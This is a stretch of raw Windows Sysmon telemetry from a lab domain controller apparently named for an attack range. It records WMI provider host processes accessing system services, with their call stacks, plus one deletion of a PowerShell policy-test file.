16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-89AA-00000000AD01}14100C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-89AA-00000000AD01}14100C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D65-603E-86AA-00000000AD01}8004ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_iwkkcfds.jea.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 